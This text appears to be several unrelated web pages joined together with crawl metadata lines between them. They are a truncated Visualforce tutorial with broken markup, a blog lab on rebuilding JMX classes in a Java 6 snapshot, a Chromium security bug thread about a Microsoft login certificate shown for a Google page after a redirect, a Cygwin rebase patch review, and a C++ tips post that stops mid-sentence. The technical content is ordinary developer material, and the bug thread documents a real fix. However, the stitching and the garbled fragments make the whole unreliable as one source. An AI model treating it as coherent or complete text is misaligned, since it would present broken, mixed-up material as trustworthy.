<apex:commandLinkLast Name </apex:commandLink> </apex:facet> </apex:column>Although the visual appearance remains the same, if you click the First Name and Last Name column headers now, they will change the sort order for the contacts list. Nice! The new markup adds two nested components to each of the <apex:column> components. <apex:column> by itself has a plain text header, but we want to make the header clickable. <apex:facet> lets us set the contents of the column header to whatever we want. And what we want is a link that calls the right action method. The link is created using the <apex:commandLink> component, with the action attribute set to an expression that references the action method in our controller. (Note that action methods, in contrast to getter methods, are named the same as the expression that references them.) When the link is clicked, it fires the action method in the controller. The action method changes the sort order private variable, and then the table is rerendered. When the table is rerendered, {! contacts } is reevaluated, which reruns the query with whatever sort order was just set. The final result is the table is resorted in the order requested by the user’s click. Beyond the Basics The header text for the first name and last name columns is hard-coded in this markup. But what if your users don’t all use English? The standard Salesforce user interface has translated versions of the field names for all standard objects, and you can provide your own translations for custom objects. How would you access these? Instead of the plain text, try this markup: <apex:outputText. That’s the right way to reference a field’s label, even if your organization all uses the same language, because it will automatically update if the field name is ever changed. Tell Me More... Getter methods pull data out of your controller onto your page. There are corresponding setter methods that let you submit values from the page back up to your controller. Like getter methods, you prefix your setters with “set”, and other than that, they’re just methods that take an argument. public MyObject__c myVariable { get; set; } Properties can be public or private, and can be read-only, or even write-only, by omitting the get or set. And you can create implementations for the get or set methods, when you want to perform additional logic besides simply saving and retrieving a value. Properties are a general feature of Apex, not specific to Visualforce. Apex is a complete programming language, and in addition to being the natural partner for building complex Visualforce pages, it’s used in many other Lightning Platform development contexts. See the Apex topics elsewhere here, and the resources at the end of this page for many ways to learn to use Apex fully. The lifecycle of a Visualforce request and response can seem complex initially. In particular, it’s important to understand that there’s no specific order in which getters or setters (or properties, if you use them) are called, so you must not introduce order-of-execution dependencies between them. There’s a lot more detail available to you in the relevant sections of the Visualforce Developer’s Guide, in particular the “Custom Controllers and Controller Extensions” chapter. Resources - Creating Your First Custom Controller - Custom Controllers and Controller Extensions - Apex Developer Guide
https://trailhead.salesforce.com/modules/visualforce_fundamentals/units/visualforce_custom_controllers
CC-MAIN-2018-30
refinedweb
1,628
63.09
. Requirements for this lab - Netbeans is not required, you just need a text editor - a Mustang source bundle snapshot, for working into it. You can download the latest snapshot of Mustang sources from - Mustang SDK binaries for compiling and running the example. You can download the latest snapshot of Mustang binaries also from - Ant 1.5 or higher. You can get Ant from Overview of this lab - Environment configuration: add Ant and Java to your PATH environment variable - Build JMX classes with the JMX build.xml provided in Mustang source bundle. No modifications to code yet. Check the jmx.jar has been created. - Compile and Run a simple example that prints the JMX implementation name. Make use of the -Xbootclasspath/p: option so that the built JMX classes take precedence over the platform's. - Edit the JMX ServiceName.java file and change the JMX implementation name. Rebuild JMX classes. - Re-run the example, which should print the modified implementation name value. - Optionally, also run the same example with the modified and rebuilt jmx.jar in the classpath, but not in bootclasspath prepend, to verify that the modified version value is not printed because the JMX classes of the platform take precedence. The lab in details NOTE: All along this document, you will encounter paths beginning like the three paths below. Of course, these paths will need to be adapted to your actual paths on your system, which should be obvious to figure out: /home/asmith/ant/1.6.5 /home/asmith/mustang_snapshot/b77_bin /home/asmith/mustang_snapshot/b77_src 1. Setup environment Check the requirements for this lab listed above and make sure you have available on your system: - a copy of a recent Mustang source snapshot to work into - a recent Mustang SDK binaries snapshot - a distribution of Ant 1.5 or higher Add Ant and the Mustang binaries to your PATH environment variable, and then check this is correct, eg: $ export PATH=/home/asmith/ant/1.6.5/bin:/home/asmith/mustang_snapshot/b77_bin/jdk1.6.0/bin:${PATH} $ ant -version Apache Ant version 1.6.5 compiled on June 2 2005 $ java -version java version "1.6.0-beta2" Java(TM) SE Runtime Environment (build 1.6.0-beta2-b77) Java HotSpot(TM) Server VM (build 1.6.0-beta2-b77, mixed mode) 2. Build the JMX classes as is cd into the j2se subdir of the directory where you have your extracted copy of the Mustang source snapshot. Checks its contents are for now similar to what is shown below. After we have performed the build, a build_jmx subdir will appear here. $ cd /home/asmith/mustang_snapshot/b77_src/j2se $ ls -l drwxrwxr-x 14 asmith staff 512 Mar 30 17:17 make/ drwxrwxr-x 6 asmith staff 512 Mar 30 17:19 src/Note that we will ignore the contents of the makesubdir for this lab. cd into JMX sources subdir and checks the JMX build.xmlfile is there. $ cd src/share/classes/javax/management $ ls -l build.xml -rw-rw-r-- 1 asmith staff 9132 Mar 30 17:18 build.xml If you want, you can see available targets for this project by typing: ant -projecthelp. Now, simply launch the build of JMX classes by typing: $ ant After the build has completed, you can check the JMX jar file is available, and also check the information put in the MANIFEST of the JMX jar file: $ cd ../../../../../build_jmx/lib $ ls -l -rw-rw-r-- 1 asmith staff 8351568 Mar 30 17:52 jmx.jar $ unzip -p jmx.jar META-INF/MANIFEST.MF Manifest-Version: 1.0 Ant-Version: Apache Ant 1.6.5 Created-By: 1.6.0-beta2-b77 (Sun Microsystems Inc.) Build-JDK: 1.6.0-beta2-b77 Build-Platform: sparc SunOS 5.10 Build-User: asmith Name: common Sealed: true Specification-Title: JMX(TM) API Specification-Version: 1.3 Specification-Vendor: Sun Microsystems, Inc. Implementation-Title: JMX(TM) API, Java SE 6 implementation Implementation-Version: 2006.03.30_17:51:45_MEST rebuild of Mustang JMX sources Implementation-Vendor: Source bundle from Sun Microsystems, Inc. - Customer rebuilt 3. Compile and Run a simple example that prints the JMX version cd up to the j2se directory, the one containing the build_jmx subdir, and create an example_jmx subdir into which to write and build our simple JMX agent: $ cd ../../ $ pwd /home/asmith/mustang_snapshot/b77_src/j2se $ mkdir example_jmx cd into the example_jmxsubdir: $ cd example_jmx Create the Agent.javafile by copying the code below and saving it into a file named Agent.java: /\* Simple JMX Agent which prints the JMX implementation name \*/ import java.lang.management.ManagementFactory; import javax.management.MBeanServer; import javax.management.MBeanServerDelegate; public class Agent { public static void main(String[] args) throws Exception { MBeanServer server = ManagementFactory.getPlatformMBeanServer(); String implName = (String) server.getAttribute( MBeanServerDelegate.DELEGATE_NAME,"ImplementationName"); System.out.println("JMX Implementation Name = " + implName ); } } Compile the Agent.javafile: $ javac Agent.java Check the compiled Agent.classfile is there. Now, there is a little tricky part for running the agent. We need to tell the Java VM to prepend its bootclasspath with the built jmx.jar, otherwise the JMX classes already in the Mustang binaries would take precedence over the built ones: $ java -Xbootclasspath/p:/home/asmith/mustang_snapshot/b77_src/j2se/build_jmx/lib/jmx.jar Agent JMX Implementation Name = JMX 4. Edit the JMX ServiceName.java file and rebuild JMX classes cd into the JMX source directory containing the ServiceName.java file: $ cd ../src/share/classes/com/sun/jmx/defaults/ Edit the ServiceName.javafile and change the value of the JMX_IMPL_NAMEstring. Let's modify it so that the line reads, say: public static final String JMX_IMPL_NAME = "JMX_JavaOne"; cd back to the directory containing the JMX build.xmlfile and rebuild all JMX classes: $ cd ../../../../javax/management/ $ ant allNOTE: it is important above to clean the previously built classes (which the target "all" does) before building them again as the JMX_IMPL_NAMEis a static field and the javac compiler inlines its value in the compiled ServiceName class and in all the classes using it. 5. Re-run the example cd back into the example_jmx subdir and run again the simple JMX Agent: $ cd ../../../../../example_jmx/ $ java -Xbootclasspath/p:/home/asmith/mustang_snapshot/b77_src/j2se/build_jmx/lib/jmx.jar Agent JMX Implementation Name = JMX_JavaOneNOTE: In the command above, make sure the path to your freshly rebuilt jmx.jarwhich you put after -Xbootclasspath/p:is correct, otherwise you will see the JMX Implementation Name value unchanged! Why? See the next and last step... 6. Run the same example without the bootclasspath prepend option If the path to your freshly rebuilt jmx.jar file is incorrect, or if you simply put it in your classpath instead of prepending your bootclasspath with it, the JMX classes already in the Mustang platform binaries are loaded in priority, and therefore you do not see your changes. Try just putting your modified jmx.jar in your classpath: $ java -cp .:/home/asmith/mustang_snapshot/b77_src/j2se/build_jmx/lib/jmx.jar Agent JMX Implementation Name = JMX 6. The end This is the end of this lab. I hope you enjoyed it, learned usefull tips for you to reuse, and will now play for yourself with the JMX code. For more JMX examples and tutorials, you should check Daniel's blog articles, starting with: Looking for JMX Overview, Examples, Tutorial, and more? -- Thanks, Joël Féraud export ANT_OPTS=-Xmx512m and it should work. Posted by Lars Westergren on mai 26, 2006 at 05:31 AM CEST # [javac] javac: invalid source release: 1.6 from ant when doing the test build, then you have exported PATH=/home/yourname/jdk1.6.0/bin but you must also remember to do export JAVA_HOME=/home/yourname/jdk1.6.0 Posted by Lars Westergren on juin 25, 2006 at 10:53 AM CEST # Posted by guest on octobre 05, 2006 at 02:10 PM CEST # Posted by Kathik on décembre 29, 2006 at 08:22 AM CET # Posted by guest on mars 26, 2007 at 10:05 AM CEST # Posted by John Burris on juin 14, 2007 at 07:34 AM CEST # Hi, Please send me some code to get the details about the session & threads and print it on screen or write to a file which is show into jconsole. Posted by Vikash on mai 03, 2008 at 03:08 AM CEST #
https://blogs.oracle.com/joel/entry/easily_modifying_and_rebuilding_jmx
CC-MAIN-2014-15
refinedweb
1,377
58.48
Enumerations are a way to group constants together and improve code readibility and type checking. Here is an example of an enumeration in Python. from enum import Enum from random import randint class Color(Enum): RED = 1 BLUE = 2 GREEN = 3 def pick_color(): pick = randint(1, 3) if pick == Color.RED.value: return Color.RED elif pick == Color.BLUE.value: return Color.BLUE elif pick == Color.GREEN.value: return Color.GREEN def print_color(color): if color == Color.RED: print('Red') elif color == Color.GREEN: print('Green') elif color == Color.BLUE: print('Blue') if __name__ == '__main__': color = pick_color() print_color(color) Python enumeration extend the enum class. After inheriting from enum, we just list out the values in our enumeration and assign them constants. The pick_color() function returns a randomly picked enumeration. We then pass that value to print_color(). You’ll notice that print_color accepts a color object and does comparisons against the values of the Color enumeration. You can see that the code is much more readible (and also more robust) than using literals such as 1, 2, or 3 in our code. The other nice aspect of using an enumeration is that we can change the values of our constants without breaking code and we can add more constants if needed. One thought on “Enumerations—Python”
https://stonesoupprogramming.com/2017/05/22/enumerations-python/
CC-MAIN-2018-05
refinedweb
216
52.56
VULNERABILITY DETAILS Happened after a redirect to from (which occured instantly when prompted the first page). The browser declared the page as "secure" although the certificate used was issued to gateway.login.live.com (a Microsoft service). If needed, i can send the aformentioned certificate. VERSION Chrome Version: Version 56.0.2924.76 (64-bit) stable Operating System: Linux 4.9.6-1-ARCH REPRODUCTION CASE Extremely rare (occured twice in 2 days of testing) and conditions are still unknown. Go to and pray for a redirection to google.com or google.fr. Thanks for the report. We've received one other report of the same issue but weren't able to get any more information from the reporter. If you are able to reproduce this, it would be extremely helpful to get a net-internals log as described at. (I know that may be impossible to get since you can't reproduce on demand, though.) I'm cc'ing jam and clamy because this feels similar to issue 662267, which I highly suspect was introduced by jam's refactor to move SSLStatus to NavigationHandleImpl and which clamy incidentally fixed (I suspect) in. Maybe there's some path through which a redirected navigation request preserves the SSLStatus from the first hop of the redirect? I've tried to reproduce the bug unsuccessfully for the past two days. I am currently trying to get directly in touch with the Microsoft Team to determine what could trigger that redirection. I'll get back to you as soon as they reply. We're investigating this but haven't had any luck reproducing yet. OP, do you know how you ended up on from the Microsoft page? Did you click on a link which redirected to Google, or did the page just spontaneously redirect to google, or something else? It just spontaneously redirected me to google. However i do have some news to this. 1°) You'll find below the answer Microsoft Security Team gave me when i asked for insights about that redirection. ---- Thank you for contacting the Microsoft Security Response Center (MSRC). Unfortunately, we were unable to reproduce your findings. As such, we have determined that this is not a valid vulnerability. As far we are aware, there are no open redirect issues on this domain. Therefore, this could potentially be an issue with your browser or a malicious attacker. ---- I find the "malicious attacker" issue to be unlikely since it happened on two different PCs with two different OSes (ArchLinux and Windows10) and on different networks. 2°) It seems that waiting a day or two without navigating to imagine.microsoft.com drastically increases chances of that redirection happening. 3°) Thanks to that new info and less than 10 secondes before receiving your email, i managed to capture the net-internals logs. I hope you'll find something useful. CHROME VERSION 56.0.2924.76 on 4.9.8-1-ARCH Did you edit that log file using some other tool? It has a bunch of 0x0A octets embedded in it that prevented reloading the file. A fixed version is attached. The server definitely appears to be sending the redirect @592077 POST /en-US/Account/FinishSignInUsingRPS?RedirectionToURL=https%3a%2f%2f HTTP/1.1 Host: imagine.microsoft.com HTTP_TRANSACTION_READ_RESPONSE_HEADERS HTTP/1.1 302 Found Location: Not at all, but the text editor i used warned me about the file being too large. Maybe it got corrupted when i saved it. Sorry about that. Nice to learn. If i can be of any more help, i'll be glad to. Thanks for the log! This is very interesting. I'm not sure how/why that request to the open redirector... is happening, but something funky looks to be happening when following it. We process the 302 redirect, but the request is cancelled before following the redirect. Maybe the Adblock Plus extension is cancelling it. And then another request to happens right afterwards, which might be the navigation request that ends up committing. I'm not sure what might be initiating that separate request; maybe an extension or maybe there's a retry somewhere that gets triggered when the initial request is cancelled. In any case, I bet there is a navigation path that gets the two requests mixed up (the cancelled redirect and the separate). I'll try reproducing in a fresh profile with Adblock Plus installed. OP, would you be willing to share a list of extensions that you have installed? Braindump since I have to head out in a few minutes: I can almost sort of kind of reproduce the sequence of events in the netlog by modifying ResourceLoader::FollowDeferredRedirectInternal to call CancelRequest() and return when the redirect URL is, and then following these steps: 1. When *not* logged into Microsoft, visit 2. Open chrome://net-internals in another tab 3. In the first tab, open DevTools and run the following JS: f=document.createElement("form"); f.action=""; f.method="POST"; document.body.appendChild(f); f.submit(); The resulting netlog matches the events in comment 5. Notably, the imagine.microsoft.com request redirects to but the request is cancelled before following the redirect, and a subsequent request happens afterwards, which looks like it has something to do with a Service Worker (the URL_REQUEST netlog entry contains SERVICE_WORKER_START_REQUEST). But, the certificate behavior doesn't repro -- I'm still ending up on with the proper cert -- so there must be some race somewhere that I'm still not hitting. Nice debugging. Emily also mentioned in person she suspecteted the bug is with RenderFrameHostImpl::TakeNavigationHandleForCommit. I originally thought it was a bug in NavigationController since I caused several bugs there, but I looked at those codepaths and I don't think they're to blame. So maybe the race is that the old NavigationHandle is still alive when TakeNavigationHandleForCommit is called and it incorrectly uses it. Somehow the old SSLStatus is used. For my active chrome extensions : 1 - Adblock Plus 1.12.4 (id: cfhdojbkjhnklbpkdaibdccddilifddb) 2 - Ember inspector 2.0.4 (id: bmdblncegkenkacieihfhpjfppoconhi) 3 - Momentum 0.92.2 (id: laookkfknpbbblfpciffpaejjkokdgca) Addendum to my "repro" in comment 9: it seems like you have to log in and then log out of login.live.com first for those instructions to work to reproduce the sequence of events in the OP's net log. (But, I'm not sure this is all that useful, anyway -- I've tried a gazillion ways and can't repro the actual bug using this sequence of steps.) OP, if you see this happen again, could you please take a screenshot that includes the tab title? Or do you happen to remember if the tab title and favicon was for Google or for Microsoft? That would help us narrow down what might be going on. Thanks! The following revision refers to this bug: commit c32cd2069ae8062b52e5b7b1faf5936bd71a583a Author: estark <estark@chromium.org> Date: Thu Feb 16 08:37:31 2017} [modify] @est...@chromium.org, related to comment 16, i can confirm that the favicon and tab title are both correct (favicon is current google logo, and title is 'Google'). The page is totally functional aswell. The only Microsoft related thing is the certificate as far as i can tell. Users experienced this crash on the following builds: Mac Canary 58.0.3015.0 - 5.11 CPM, 3 reports, 3 clients (signature [Dump without crash] content::`anonymous namespace'::MaybeDumpCopiedNonSameOriginEntry) If this update was incorrect, please add "Fracas-Wrong" label to prevent future updates. - Go/Fracas Users experienced this crash on the following builds: Win Canary 58.0.3015.0 - 8.83 CPM, 32 reports, 32 clients (signature [Dump without crash] content::`anonymous namespace'::MaybeDumpCopiedNonSameOriginEntry) Mac Canary 58.0.3015.0 - 6.59 CPM, 7 reports, 7 clients (signature [Dump without crash] content::`anonymous namespace'::MaybeDumpCopiedNonSameOriginEntry) If this update was incorrect, please add "Fracas-Wrong" label to prevent future updates. - Go/Fracas This crash has high impact on Chrome's stability. Signature: [Dump without crash] content::`anonymous namespace'::MaybeDumpCopiedNonSameOriginEntry. Channel: canary. Platform: win. Labeling issue 688425 with ReleaseBlock-Dev. If this update was incorrect, please add "Fracas-Wrong" label to prevent future updates. - Go/Fracas Removing ReleaseBlock label, the crash is a DumpWithoutCrashing that we added to gather more data. The following revision refers to this bug: commit b1730dabdf125160dc23db993e08f453fc648fc8 Author: estark <estark@chromium.org> Date: Sun Feb 19 00:06:26 2017} [modify] [modify] [modify] @erasmus425: can you try using Canary channel to reproduce this? And please enable crash/error reporting. @estark added logging and it would be great if we can confirm where the error is. Thanks. I might be mistaken, but i'm reading everywhere that the canary version isn't available to the Linux platform. Do you have any solution ? Since my main computer is on Linux, it might take a while before i can reproduce this bug in a Windows environment. Issue 694184 has been merged into this issue. @eramus425: ah you're right, I didn't notice you're on Linux. Regardless, Emily seems to have tracked this down to the code path. For Googlers reading this, per Maria here's a convenient link to look at all the crash reports that came with the debugging info Emily added: This shows all the crash keys in one table. The main takeways are: -RendererDidNavigateToNewPage is not involved -all of the reports are from RendererDidNavigateToExistingPage -there are no in_page hits The following revision refers to this bug: commit 7e735c119621aadf893858adb6c37b58325d5e94 Author: jam <jam@chromium.org> Date: Tue Feb 21 21:18:54 2017 Revert of Use ScopedCrashKey for RendererDidNavigate crash dumps (patchset #4 id:60001 of ) Reason for revert: We got the data we wanted. Original issue's description: >} > Committed: TBR=creis@chromium.org,rsesek@chromium.org,ananta@chromium.org,estark@chromium.org # Not skipping CQ checks because original CL landed more than 1 days ago. BUG= 688425 Review-Url: Cr-Commit-Position: refs/heads/master@{#451834} [modify] [modify] [modify] It seems like estark@ is making good progress on this, please re-assign if you aren't the right owner. jam@'s got a fix coming soon. The following revision refers to this bug: commit c5608a34fd0112511e9165179a91cdd9277518b2 Author: jam <jam@chromium.org> Date: Wed Feb 22 09:49:13 2017 Revert of Add DumpWithoutCrashing in RendererDidNavigateToExistingPage (patchset #3 id:40001 of ) Reason for revert: We got the data we wanted. Original issue's description: >} > Committed: TBR=nasko@chromium.org,estark@chromium.org # Not skipping CQ checks because original CL landed more than 1 days ago. BUG= 688425 Review-Url: Cr-Commit-Position: refs/heads/master@{#451960} [modify] The following revision refers to this bug: commit a78746ec1a1bfa668f5bcb01d2b2665d2c514369 Author: jam <jam@chromium.org> Date: Wed Feb 22 17:21:57 2017 Fix SSL certificate being wrong in the intended_as_new_entry fase} [modify] Tomorrow I can merge 452106 to 57 Please mark security bugs as fixed as soon as the fix lands, and before requesting merges. This update is based on the merge- labels applied to this issue. Please reopen if this update was incorrect. For more details visit - Your friendly Sheriffbot +awhalley@ for M57 merge review. govind@ - this will be good for M57 tomorrow after some more time in canary. jam@ - thanks for the investigation and fix! Thank you awhalley@. Please update after Canary baking. If all looks good, I will approve the merge. Thank you. Thanks, will check in tomorrow. Emily tracked this down; the fix is trivial after she localized it :) @awhalley @govind ok to merge? Approving merge to M57 branch 2987 after discussing with awhalley@. Please merge ASAP. Thank you. The following revision refers to this bug: commit d37f8f3c85e4c2f6c5d040478f5067969f278650 Author: John Abd-El-Malek <jam@chromium.org> Date: Fri Feb 24 19:20:11 2017 Fix SSL certificate being wrong in the intended_as_new_entry case} (cherry picked from commit a78746ec1a1bfa668f5bcb01d2b2665d2c514369) Review-Url: . Cr-Commit-Position: refs/branch-heads/2987@{#680} Cr-Branched-From: ad51088c0e8776e8dcd963dbe752c4035ba6dab6-refs/heads/master@{#444943} [modify] The following revision refers to this bug: commit 43f7ab4d121be7ad05f31728ccc130d500232031 Author: nasko <nasko@chromium.org> Date: Wed Mar 01 21:47:48 2017} [modify] The following revision refers to this bug: commit 494a3b618ecf62e96f14c195a0d2234b20db785c Author: jam <jam@chromium.org> Date: Wed Mar 01 22:07:16 2017 Revert of Change CHECK into DCHECK. (patchset #1 id:1 of ) Reason for revert: (per discussion, I was using this to get a signal. I'll send a cl to fix) Original issue's description: >} > Committed: TBR=creis@chromium.org,nasko@chromium.org # Skipping CQ checks because original CL landed less than 1 days ago. NOPRESUBMIT=true NOTREECHECKS=true NOTRY=true BUG= 688425 Review-Url: Cr-Commit-Position: refs/heads/master@{#454058} [modify] Congratulations! The panel decided to award $3,000 for this! A member of our finance team will be in touch. ********************************* I did not know that would fit in the Google reward Bounty program, that's awesome ! Would it be possible to give a part to charity ? To whom shall i address for it ? erasmus425@ - great to hear! I've followed up in email. This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit - Your friendly Sheriffbot
https://bugs.chromium.org/p/chromium/issues/detail?id=688425
CC-MAIN-2018-51
refinedweb
2,185
58.08
This is the mail archive of the cygwin-apps mailing list for the Cygwin project. Hi Chuck, On Jul 22 20:26, Charles Wilson wrote: > On 7/21/2011 3:38 PM, Charles Wilson wrote: > >> IMHO it would make sense to bump LIB_VERSION and create a new rebase > >> package ASAP, so we can get some more people to test it. > > > > Give me a day or so to do the mingw/msys gloss, before updating > > LIB_VERSION and cutting a new release, ok? > > The attached allows to build on msys, as well as cygwin & mingw, and > appears to work properly on all three platforms. There's definitely a bug in the Mingw code, though. I reviewed the patch, comments inline. > Also, I added a quick-n-dirty rebase-dump application. It actually > helped me track down a problem on mingw: the db was not being opened in > binary mode, and for some reason that prevented rebase (and rebase-dump) > from being able to load the strings (it loaded the other bits of the db > fine!) > > I don't know why, but when I added O_BINARY everything was copacetic. LF->CRLF conversion? > When I say quick-n-dirty, I mean: lots of duplicated and only slightly > modified code from rebase.c. There's room for code consolidation, so > this bit could be put off until later. Right. Especially all the db file information should go into a new header file. > Index: Makefile.in > =================================================================== > RCS file: /cvs/cygwin-apps/rebase/Makefile.in,v > retrieving revision 1.6 > diff -u -p -r1.6 Makefile.in > --- Makefile.in 21 Jul 2011 19:10:04 -0000 1.6 > +++ Makefile.in 22 Jul 2011 23:59:08 -0000 > @@ -58,9 +58,10 @@ ASH = @ASH@ > DEFAULT_INCLUDES = -I. -I$(srcdir) -I$(srcdir)/imagehelper > DEFS = @DEFS@ - > -override CFLAGS+=-Wall -Werror > -override CXXFLAGS+=-Wall -Werror > -override LDFLAGS+=-static -static-libgcc > +override CFLAGS+=-Wall -Werror @EXTRA_CFLAG_OVERRIDES@ > +override CXXFLAGS+=-Wall -Werror @EXTRA_CFLAG_OVERRIDES@ > +override LDFLAGS+=-static @EXTRA_LDFLAG_OVERRIDES@ > +override CXX_LDFLAGS+=@EXTRA_CXX_LDFLAG_OVERRIDES@ Why is CXX_LDFLAGS necessary? I see what you do but I can't imagine the msys compiler doesn't know -static-libstdc++. > .SUFFIXES: > .SUFFIXES: .c .cc .$(O) > @@ -76,6 +77,9 @@ LIBIMAGEHELPER = imagehelper/libimagehel > REBASE_OBJS = rebase.$(O) $(LIBOBJS) > REBASE_LIBS = $(LIBIMAGEHELPER) > > +REBASE_DUMP_OBJS = rebase-dump.$(O) $(LIBOBJS) > +REBASE_DUMP_LIBS = I'll ignore the rebase-dump stuff for now. > Index: peflagsall.in > =================================================================== > RCS file: /cvs/cygwin-apps/rebase/peflagsall.in,v > retrieving revision 1.1 > diff -u -p -r1.1 peflagsall.in > --- peflagsall.in 20 Jun 2011 23:27:00 -0000 1.1 > +++ peflagsall.in 22 Jul 2011 23:59:08 -0000 > @@ -131,9 +131,39 @@ ArgDynBase= > # First see if caller requested help > check_args_for_help "$@" > > +#' |\ What's the reason to do that? I don't see how that should be necessary. All the tools are used before peflags is called, so there's no problem to change them as well, just as on Cygwin. > Index: rebase.c > =================================================================== > RCS file: /cvs/cygwin-apps/rebase/rebase.c,v > retrieving revision 1.6 > diff -u -p -r1.6 rebase.c > --- rebase.c 21 Jul 2011 19:10:04 -0000 1.6 > +++ rebase.c 22 Jul 2011 23:59:09 -0000 > @@ -50,6 +56,10 @@ FILE *file_list_fopen (const char *file_ > char *file_list_fgets (char *buf, int size, FILE *file); > int file_list_fclose (FILE *file); > void version (); > +#if defined(__MSYS__) > +/* MSYS has no strtoull */ > +unsigned long long strtoull(const char *, char **, int); > +#endif Does it have strtoll? It should have since the function is available in Cygwin since October 2001, which means it was available in Cygwin 1.3.4 already. Msys has been forked after that, afaics. So, if we have strtoll, you could simply use that and cast the result to uint64_t, rather than to paste some external strtoull implementation. > @@ -160,11 +172,20 @@ main (int argc, char *argv[]) > if (image_storage_flag) > { > if (load_image_info () < 0) > - return 2; > + return 2; > img_info_rebase_start = img_info_size; > } > > -#ifdef __CYGWIN__ > +#if defined(__MSYS__) > + if (machine == IMAGE_FILE_MACHINE_I386) > + { > + GetImageInfos64 ("/bin/msys-1.0.dll", NULL, > + &cygwin_dll_image_base, &cygwin_dll_image_size); > + /* See cygwin code, below */ > + cygwin_dll_image_base -= 3 * ALLOCATION_SLOT; > + cygwin_dll_image_size += 3 * ALLOCATION_SLOT + 8 * ALLOCATION_SLOT; This is not correct for msys. Msys has been forked off from Cygwin 1.3. Back in 1.3 days, the shared memory areas were not allocated in front of the DLL. Rather, the default address for the shared memory areas was 0xa000000, bottom up. I also doubt that it's really necessary to add the slop factor to the end. > @@ -308,7 +331,8 @@ save_image_info () > hdr.offset = offset; > hdr.down_flag = down_flag; > hdr.count = img_info_size; > - if (write (fd, &hdr, sizeof hdr) < 0) > + errno = 0; > + if (write (fd, &hdr, sizeof (hdr)) < 0) Why are you setting errno to 0, if it's only printed if write fails, which sets errno anyway? > @@ -480,7 +505,7 @@ load_image_info () > for (i = 0; i < img_info_size; ++i) > { > img_info_list[i].name = (char *) > - malloc (img_info_list[i].name_size); > + calloc (img_info_list[i].name_size, sizeof(char)); There's no reason to use calloc, it's overwritten by the subsequent read() anyway. This is differnt from the calloc for img_info_list, which will only get partially filled by the read call. > @@ -526,13 +551,15 @@ merge_image_info () > for (i = img_info_rebase_start; i + 1 < img_info_size; ++i) > if ((img_info_list[i].name_size == img_info_list[i + 1].name_size > && !strcmp (img_info_list[i].name, img_info_list[i + 1].name)) > -#ifdef __CYGWIN__ > +#if defined(__MSYS__) > + || !strcmp (img_info_list[i].name, "/usr/bin/msys-1.0.dll") > +#elif defined(__CYGWIN__) > || !strcmp (img_info_list[i].name, "/usr/bin/cygwin1.dll") > #endif What about defining the name of the DLL like this: #if defined (__MSYS__) #define CYGWIN_DLL "/usr/bin/msys-1.0.dll" #elif defined (__CYGWIN__) #define CYGWIN_DLL "/usr/bin/cygwin1.dll" #endif and just use it subsequently, rather than adding more #if's? > +#else > + { > + /* Borrow cygwin code for extracting module path, but use ANSI */ > + char exepath[PATH_MAX]; PATH_MAX? How big is that in native Win32? If it's equivalent to MAX_PATH, you don't have to worry about long path prefixes. > + char* p = NULL; > + char* p2 = NULL; > + size_t sz = 0; > + > + if (!GetModuleFileNameA (NULL, exepath, PATH_MAX)) > + fprintf (stderr, "%s: can't determine rebase installation path\n", > + progname); > + p = exepath; > + if (strncmp (p, "\\\\?\\", 4)) /* No long path prefix. */ > + { > + if (!strncasecmp (p, "\\\\", 2)) /* UNC */ > + { > + p = strcpy (p, "\\??\\UN"); Hang on. You're adding the native NT path prefix for DOS devices? What's that supposed to accomplish, given that the subsequent code uses msvcrt functions, which work with Win32 paths? > + GetModuleFileNameA (NULL, p, PATH_MAX - 6); > + *p = 'C'; That... > + } > + else > + { > + p = strcpy (p, "\\??\\"); Same NT path prefix weirdness. > + GetModuleFileNameA (NULL, p, PATH_MAX - 4); ...and that won't work. You replaced calls to wcpcpy with calls to strcpy. Either use stpcpy, or add strlen(p) to p. Fortunately the strcpy's are wrong, so the path is just what GetModuleFileNameA returned, a plain Win32 path, which is what you need. So, in fact you should just use the path returned by GetModuleFileNameA and... > + /* strip off exename and trailing slash */ ..yes, exactly. > +#if defined(__MSYS__) > +/* implementation adapted from google andriod bionic libc's s/andriod/android However, as mentioned above, I'd remove this code and just create a small wrapper around the strtoll function. > Index: rebaseall.in > =================================================================== > RCS file: /cvs/cygwin-apps/rebase/rebaseall.in,v > retrieving revision 1.4 > diff -u -p -r1.4 rebaseall.in > --- rebaseall.in 21 Jul 2011 19:10:04 -0000 1.4 > +++ rebaseall.in 22 Jul 2011 23:59:09 -0000 > @@ -64,9 +64,39 @@ case `uname -m` in > ;; > esac > > +#' |\ > + sort | uniq | grep -E '.' Same as in peflagsall.in, I don't see why this should be necessary. Corinna -- Corinna Vinschen Please, send mails regarding Cygwin to Cygwin Project Co-Leader cygwin AT cygwin DOT com Red Hat
http://cygwin.com/ml/cygwin-apps/2011-07/msg00095.html
CC-MAIN-2016-44
refinedweb
1,255
68.06
Hello, I'm very new on rails, I discovered it last week so, sorry if my question are stupid, I am wainting for some books on rails, read some documentation but can’t solve this problems. I imported gem for autenticate account (signup, login, logout) but I want to extend it so the user fills some important information that will be stored in other table rather than users, this is the table company, when the user creates their account, a company would be created. So I modify the rhtml of the view, include some fields of the company table, an in the controller user in signup method def signup @user = User.new I inserted this line @company = Company.new also in def create @company = Company.new(params[:firm]) @user = User.new(params[:user]) end The form inserts the data for user, but not for company, any idea how to accomplish this? Thank you
https://www.ruby-forum.com/t/newby-how-to-save-information-of-two-tables-in-a-single-dat/77145
CC-MAIN-2022-33
refinedweb
153
59.23
This is part of my weekly C++ posts based on the daily C++ tips I make at my work. I strongly recommend this practice. If you dont have it in your company start it. 1. std::is_trivially_copyable std::is_trivially_copyable tests a type (or a C-style array) if its a TriviallyCopyable type. In short this means if you can and you are allowed to just memcpy one object into another. "If you can" (obviously you can memcpy everything but...) means that the type does not have virtual member function, virtual base class or any non-trivial (user provided) copy/move operations or destructor. Providing any user defined copy/move operation or destructor signals the compiler that there is something special about this type and it should avoid some optimizations. "You are allowed" means that at least one move/copy operations is not deleted and the destructor is not deleted too. We can guard our types with static_assert to make sure they stay trivially copyiable. For example: template <class T>So if someone tries to modify something, for example adding a destructor to the point struct, it wont compile. struct point { T x; T y; }; struct MemcpyMe { double a = 0; long b[3] = { 0, 1, 2 }; std::array<point<long>, 2> pts; }; static_assert(std::is_trivially_copyable_v<MemcpyMe> == true, "The struct name!"); Another benefit is that STL is aware of trivial classes and enables memcpy/memmove optimizations if it decides it is suitable but before relying on that make sure what your STL implementation does and under what circumstances. 2. von Neumann bottleneck von Neumann bottleneck is the throughput limitation due to insufficient rate of data transfer between the memory and the CPU. As hardware progressed CPU speed for the money invested increased much faster than the memory speed. So hardware vendors decided to create buffers between the RAM and the CPU - L1, L2, etc 